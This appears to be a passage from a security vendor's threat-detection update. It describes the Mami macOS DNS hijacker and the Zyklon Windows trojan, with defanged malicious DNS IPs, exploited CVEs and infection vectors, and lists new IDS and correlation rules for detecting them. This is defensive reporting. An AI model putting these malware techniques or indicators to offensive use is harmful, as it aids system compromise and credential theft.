Mami is a new Mac OS DNS Hijacker discovered in early 2018. It seems to be the first DNS Hijacker for this platform.

The malware is spread inside Mac OS installation files (.dmg). It adds a DNS server (with the IPs 82.163.143[.]135 and 82.163.142[.]137) and persists these changes through a routine that overrides the system's DNS entries periodically. In addition to creating malicious DNS entries, the malware is capable of taking screenshots, generating mouse events, downloading and uploading files, and elevating privileges.

A different version for Windows has existed since 2015 under the name of DNSUnlocker. Like Mami, it also adds the IPs listed above as DNS servers and malicious SSL certificates.

We've added the following correlation rule to detect this activity:

System Compromise, Trojan infection, OSX/Mami

Added Detection Technique – Malware SSL Certificates

We've added new IDS signatures to include more certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

System Compromise, C&C Communication, Lazarus SSL Certificate

System Compromise, C&C Communication, Adwind SSL Certificate

Updated Detection Technique – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

Zyklon is a well-known HTTP malware, first observed in the wild in 2016, which has been spread in recent campaigns thanks to new vulnerabilities detected in Microsoft Office. It's publicly available, and provides features such as keylogging, password harvesting, conducting distributed denial-of-service attacks, and self-upload and removal. It communicates with a C&C server anonymously, via the Tor network.

Similarly to other versions of the family, it is able to download executables, steal passwords from web browsers, and perform cryptocurrency mining. The most common infection vector is spam emails containing a ZIP attachment with a malicious DOC file, which executes a PowerShell script on Windows. The most common vulnerabilities exploited by Zyklon malware are CVE-2017-8759 and CVE-2017-11882.

We've added IDS signatures and the following correlation rule to detect this activity:

System Compromise, Trojan infection, Zyklon

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity: